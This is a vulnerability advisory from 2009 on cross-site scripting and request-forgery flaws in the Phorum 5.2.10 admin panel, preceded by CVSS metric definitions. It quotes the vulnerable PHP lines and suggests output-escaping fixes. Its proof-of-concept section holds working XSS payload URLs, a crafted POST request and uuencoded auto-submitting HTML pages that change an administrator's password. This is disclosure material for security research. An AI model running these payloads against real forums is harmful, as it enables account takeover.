The vulnerable system is bound to the network stack and the set of possible attackers extends beyond the other options listed below, up to and including the entire Internet. Such a vulnerability is often termed “remotely exploitable” and can be thought of as an attack being exploitable at the protocol level one or more network hops away (e.g., across one or more routers). An example of a network attack is an attacker causing a denial of service by sending a specially crafted TCP packet across a wide area network (e.g., CVE-2004-0230).
Attack Complexity
Low
AC
The attacker must take no measurable action to exploit the vulnerability. The attack requires no target-specific circumvention to exploit the vulnerability. An attacker can expect repeatable success against the vulnerable system.
Privileges Required
None
PR
The attacker is unauthenticated prior to attack, and therefore does not require any access to settings or files of the vulnerable system to carry out an attack.
Scope
Unchanged
S
An exploited vulnerability can only affect resources managed by the same security authority. In the case of a vulnerability in a virtualized environment, an exploited vulnerability in one guest instance would not affect neighboring guest instances.
Confidentiality
None
C
There is no impact on the confidentiality of the system; the attacker does not gain the ability to read any data.
Integrity
Low
I
Modification of data is possible, but the attacker does not have control over what can be modified, or the extent of what the attacker can affect is limited. The data modified does not have a direct, serious impact on the system.
Availability
None
A
There is no impact on the availability of the system; the attacker does not have the ability to disrupt access to or use of the system.
Phorum < 5.2.10 Cross-Site Scripting/Request Forgery
Title: Phorum < 5.2.10 Cross-Site Scripting/Request Forgery
Advisory ID: VUDO-2009-1504
Advisory URL: http://research.voodoo-labs.org/advisories/4
Date founded: 10-4-2009
Vendors contacted: Phorum
Class: Multiple Vulnerabilities
Remotely Exploitable: Yes
Localy Exploitable: No
Exploit/PoC Available: Yes
Policy: Full Disclosure Policy (RFPolicy) v2.0
#=Tested & Vulnerable packages
[+] Phorum 5.2.10
[+] Phorum 5.2-dev
Solutions and Workarounds
Phorum released some important fixes for the Cross-Site Scripting vulnerabilities [1]
Technical Information
Phorum [2] suffers from a series of Cross-Site Scripting (XSS) and Cross-Site Request Forgery (CSRF) vulnerabilities, trough the admin panel and the "file uploading" section (with an XML file but it only works if you are using Mozilla Firefox as browser and a crafted XUL file). Some other vulnerabilities:
[*] Cross-Site Scripting (XSS):
The most simple XSS can be executed easily and the error can be found on the file
"include/admin/banlist.php":
+++include/admin/banlist.php @@ 88:104
88 if($_GET["curr"] && $_GET["delete"]){
89
90 ?>
91
92 <div class="PhorumInfoMessage">
93 Are you sure you want to delete this entry?
94 <form action="<?php echo $PHORUM["admin_http_path"] ?>" method="post">
95 <input type="hidden" name="module" value="<?php echo $module; ?>" />
XXX 96 <input type="hidden" name="curr" value="<?php echo $_GET['curr']; ?>" />
97 <input type="hidden" name="delete" value="1" />
98 <input type="submit" name="confirm" value="Yes" /> <input type="submit"
name="confirm" value="No" />
99 </form>
100 </div>
101
102 <?php
103
104 } else {
---include/admin/banlist.php
The same security flaw can be found in the file "include/admin/banlist.php", line 94, and can be also exploited with a single GET petition.
Here's another XSS attack but more difficult to be exploited, because you need to modify the user's cookies to store the vector and redirect him to the "versioncheck.php" file:
+++versioncheck.php @@ 79:83
79 <?php if ($upgrade_available) { ?>
80 <div class="notify_upgrade">
XXX 81 <a target="_top" href="admin.php?module=version">New Phorum version <?php print
$upgrade_available ?> available!</a>
82 </div>
83 <?php } else { ?>
---versioncheck.php
There's another XSS on the file "include/admin/users.php" but it can only be exploited from a POST request on this lines:
+++include/admin/users.php @@ 87:93
87 //check for a valid email
88 if (!empty($_POST["email"])) {
89 include('./include/email_functions.php');
90 $valid_email = phorum_valid_email($_POST["email"]);
91 if ($valid_email !== true)
XXX 92 $error = "The email \"$_POST[email]\" is not valid!";
93 }
---include/admin/users.php
Also the line 82, on the same file, its vulnerable to the same attack.
In the users.php file there's another vulnerable line, trough the request Referer parameter or
$_POST['referrer'].
+++include/admin/users.php @@ 52:59
52if (isset($_POST['referrer'])) {
XXX 53 $referrer = $_POST['referrer'];
54 unset($_POST['referrer']);
55} elseif (isset($_SERVER['HTTP_REFERER'])) {
XXX 56 $referrer = $_SERVER['HTTP_REFERER'];
57} else {
58 $rererrer = "{$PHORUM["admin_http_path"]}?module=users";
59}
---include/admin/users.php
+++include/admin/users.php @@ 659:661
659
XXX 660 $frm->hidden("referrer", $referrer);
661
---include/admin/users.php
A way to fix this can be done using htmlspecialchars() or htmlentities() and any other function that
does a sanity check, i.e:
+++
<input type="hidden" name="curr" value="<?php echo htmlentities($_GET['curr'], ENT_QUOTES,
'UTF-8'); ?>" />
---
[*] Cross-Site Request Forgery (CSRF):
All the forms on the admin panel it's vulnerable to CSRF because of the lack of security tokens to check if the administrator really wants to do those actions. Without a token an attacker can create a new user as admin or change the administrator passwords and other personal data. Another type of action can be done with a simple bbcode [img] tag. When the administrator see the [img] tag with a special crafted URL, an action, such as delete a topic, could be executed.
A more dangerous attack can lead to JavaScript execution.
[3] Other vulnerabilities were founded on this application. (WHK)
#=~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~=#
#=Proof of Concept=#=~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~=#
[*] Cross-Site Scripting (XSS):
+++
http://localhost/phorum-5.2.10/admin.php?module=banlist&curr=1"><img/src/onerror="alert('voodoo');
&delete=1
---
+++
http://www.victim.com/phorum-5.2.10/admin.php?module=badwords&curr=1"><img/src/onerror="
alert('voodoo');&delete=1
---
+++
javascript:with(document)cookie="phorum_upgrade_available=
<iframe/src='javascript:alert(/voodoo/.source)'>",
location="http://www.victim.com/phorum-5.2.10/versioncheck.php";
---
+++
POST /phorum-5.2.10/admin.php HTTP/1.1
module=users&referrer=http%3A%2F%2Fwww.victim.com%2Fphorum-5.2.10%2Fadmin.php%3Fmodule%3Dusers&addUser=1&username=xss&real_name=xss&
email=%3Ciframe%2Fsrc%3D%22javascript%3Aalert%28%27voodoo%27%29%3B%22%3E&password1=xss&password2=xss &admin=0
---
[*] Cross-Site Request Forgery (CSRF):
Other CSRF proof-of-concept exploits can be found on:
[*] http://research.voodoo-labs.org/code/exploits/phorum/5.2.10/
If the administrator see this special crafted HTML page, his password will be changed to a string specified by the attacker. (uuencoded)
+++
begin 644 attack.html
M/&AT;6P^"CQB;V1Y/@H)/&@Q/E!H;W)U;2`U+C(N,3`@(F5D:71U<V5R(B!#
M4U)&(&%T=&%C:SPO:#$^"@D\9F]R;2!A8W1I;VX](FAT='`Z+R]W=W<N=FEC
M=&EM+F-O;2]P:&]R=6TM-2XR+C$P+V%D;6EN+G!H<"(@;65T:&]D/2)03U-4
M(CX*"0D\:6YP=70@;F%M93TB;6]D=6QE(B!V86QU93TB=7-E<G,B('1Y<&4]
M(FAI9&1E;B(^"@D)/&EN<'5T(&YA;64](G-E8W1I;VXB('9A;'5E/2)M86EN
M(B!T>7!E/2)H:61D96XB/@H)"3QI;G!U="!N86UE/2)R969E<G)E<B(@=F%L
M=64](FAT='`Z+R]W=W<N=FEC=&EM+F-O;2]P:&]R=6TM-2XR+C$P+V%D;6EN
M+G!H<"(@='EP93TB:&ED9&5N(CX*"0D\:6YP=70@;F%M93TB=7-E<E]I9"(@
M=F%L=64](C$B('1Y<&4](FAI9&1E;B(^"@D)/&EN<'5T(&YA;64](G)E86Q?
M;F%M92(@<VEZ93TB-3`B('9A;'5E/2(B('1Y<&4](FAI9&1E;B(^"@D)/&EN
M<'5T(&YA;64](F5M86EL(B!S:7IE/2(U,"(@=F%L=64](F%D;6EN0'=E8FUA
M<W1E<BYC;VTB('1Y<&4](FAI9&1E;B(^"@D)/&EN<'5T(&YA;64](G!A<W-W
M;W)D,2(@=F%L=64](G!W;F5D(B!T>7!E/2)H:61D96XB/@H)"3QI;G!U="!N
M86UE/2)P87-S=V]R9#(B('9A;'5E/2)P=VYE9"(@='EP93TB:&ED9&5N(CX*
M"0D\=&5X=&%R96$@<W1Y;&4](G=I9'1H.C!P>#MH96EG:'0Z,'!X.V)O<F1E
M<CHP<'@[(B!N86UE/2)S:6=N871U<F4B(&-O;',](C,P(B!R;W=S/2(U(CYV
M;V]D;V\\+W1E>'1A<F5A/@H)"3QS96QE8W0@<W1Y;&4](G=I9'1H.C!P>#MH
M96EG:'0Z,'!X.V)O<F1E<CHP<'@[(B!N86UE/2)A8W1I=F4B/@H)"0D\;W!T
M:6]N('9A;'5E/2(P(CY.;SPO;W!T:6]N/@H)"0D\;W!T:6]N('9A;'5E/2(Q
M(B!S96QE8W1E9#TB<V5L96-T960B/EEE<SPO;W!T:6]N/@H)"3PO<V5L96-T
M/@H)"3QS96QE8W0@<W1Y;&4](G=I9'1H.C!P>#MH96EG:'0Z,'!X.V)O<F1E
M<CHP<'@[(B!N86UE/2)A9&UI;B(^"@D)"3QO<'1I;VX@=F%L=64](C`B/DYO
M/"]O<'1I;VX^"@D)"3QO<'1I;VX@=F%L=64](C$B('-E;&5C=&5D/2)S96QE
M8W1E9"(^665S/"]O<'1I;VX^"@D)/"]S96QE8W0^"@D)/&EN<'5T('9A;'5E
M/2)5<&1A=&4B(&-L87-S/2)I;G!U="UF;W)M+7-U8FUI="(@='EP93TB:&ED
M9&5N(CX*"3PO9F]R;3X*"3QS8W)I<'0^<V5T5&EM96]U="AF=6YC=&EO;B_at_I
M>V1O8W5M96YT+F9O<FUS6S!=+G-U8FUI="@I.WTL,'@U,#`I.SPO<V-R:7!T
3/@H\+V)O9'D^"CPO:'1M;#X*"@``
`
end
---
[*] CSRF + XSS:
This is another way to exploit those two types of attacks (XSS and CSRF). If the administrator see this page a new folder will be created and the name is going to be a special HTML tag with a JavaScript script. (uuencoded)
+++
begin 644 attack.html
M/&AT;6P^"CQB;V1Y/@H)/&@Q/E!H;W)U;2`U+C(N,3`@(FYE=V9O;&1E<B(@
M0U-21BM84U,@871T86-K/"]H,3X*"3QF;W)M(&%C=&EO;CTB:'1T<#HO+W=W
M=RYV:6-T:6TN8V]M+W!H;W)U;2TU+C(N,3`O861M:6XN<&AP(B!M971H;V0]
M(E!/4U0B/@H)"3QI;G!U="!T>7!E/2)H:61D96XB(&YA;64](F9O;&1E<E]F
M;&%G(B!V86QU93TB,2(^"@D)/&EN<'5T('1Y<&4](FAI9&1E;B(@;F%M93TB
M;6]D=6QE(B!V86QU93TB;F5W9F]L9&5R(CX*"0D\:6YP=70@='EP93TB:&ED
M9&5N(B!N86UE/2)N86UE(B!S:7IE/2(S,"(@=F%L=64](B9L=#MI9G)A;64O
M<W)C/2=J879A<V-R:7!T.F%L97)T*"]V;V]D;V\O+G-O=7)C92D[)R9G=#LB
M(#X\+W1D/@H)"3QT97AT87)E82!N86UE/2)D97-C<FEP=&EO;B(@8V]L<STB
M-C`B(')O=W,](C$P(B!S='EL93TB=VED=&@Z,'!X.VAE:6=H=#HP<'@[8F]R
M9&5R.C!P>#LB/CPO=&5X=&%R96$^/"]T9#X*"0D\<V5L96-T('-T>6QE/2)W
M:61T:#HP<'@[:&5I9VAT.C!P>#MB;W)D97(Z,'!X.R(@;F%M93TB<&%R96YT
M7VED(B`^"@D)"3QO<'1I;VX@=F%L=64](C$B('-E;&5C=&5D/2)S96QE8W1E
M9"(^+2U.;VYE+2T\+V]P=&EO;CX*"0D\+W-E;&5C=#X*"0D\<V5L96-T('-T
M>6QE/2)W:61T:#HP<'@[:&5I9VAT.C!P>#MB;W)D97(Z,'!X.R(@;F%M93TB
M86-T:79E(B`^"@D)"3QO<'1I;VX@=F%L=64](C`B/DYO/"]O<'1I;VX^"@D)
M"3QO<'1I;VX@=F%L=64](C$B('-E;&5C=&5D/2)S96QE8W1E9"(^665S/"]O
M<'1I;VX^"@D)/"]S96QE8W0^"@D)/'-E;&5C="!S='EL93TB=VED=&@Z,'!X
M.VAE:6=H=#HP<'@[8F]R9&5R.C!P>#LB(&YA;64](G1E;7!L871E(B`^"@D)
M"3QO<'1I;VX@=F%L=64](F5M97)A;&0B('-E;&5C=&5D/2)S96QE8W1E9"(^
M4&AO<G5M($5M97)A;&0_at_5&5M<&QA=&4@,2XP/"]O<'1I;VX^"@D)"3QO<'1I
M;VX@=F%L=64](F-L87-S:6,B/D-L87-S:6,@4&AO<G5M(%1E;7!L871E(#`N
M-#PO;W!T:6]N/@H)"0D\;W!T:6]N('9A;'5E/2)L:6=H='=E:6=H="(^4&AO
M<G5M($QI9VAT=V5I9VAT(%1E;7!L871E(#$N,#PO;W!T:6]N/@H)"3PO<V5L
M96-T/@H)"3QS96QE8W0@<W1Y;&4](G=I9'1H.C!P>#MH96EG:'0Z,'!X.V)O
M<F1E<CHP<'@[(B!N86UE/2)L86YG=6%G92(@/@H)"0D\;W!T:6]N('9A;'5E
M/2)E;F=L:7-H(CY%;F=L:7-H("A!;65R:6-A;BD\+V]P=&EO;CX*"0D\+W-E
M;&5C=#X*"0D\:6YP=70@='EP93TB:&ED9&5N(B!I9#TB861M:6Y?8VAE8VMB
M;WA?,2(@;F%M93TB=G)O;W0B('9A;'5E/2(Q(CX*"0D\:6YP=70@='EP93TB
M:&ED9&5N(B!V86QU93TB4W5B;6ET(B!C;&%S<STB:6YP=70M9F]R;2US=6)M
M:70B/@H)/"]F;W)M/@H)/'-C<FEP=#YS9714:6UE;W5T*&9U;F-T:6]N*"E[
M9&]C=6UE;G0N9F]R;7-;,%TN<W5B;6ET*"D[?2PP>#4P,"D[/"]S8W)I<'0^
2"CPO8F]D>3X*/"]H=&UL/@H*
`
end
---
Reporting Timeline
[*] 10-04-2009: Bugs discovered.
[*] 10-04-2009: Voodoo contacted the vendor (advisory draft included).
[*] 13-04-2009: The vendor released fixes for Cross-Site Scripting vulnerabilities.
[*] 15-04-2009: Advisory VUDO-2009-1504 published.
References
[1] http://trac.phorum.org/changeset/4009
[2] http://www.phorum.org/
[3] http://foro.elhacker.net/nivel_web/multiples_fallas_en_phorum_5210-t248300.0.html
This information is provided for TESTING and LEGAL RESEARCH purposes only. All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum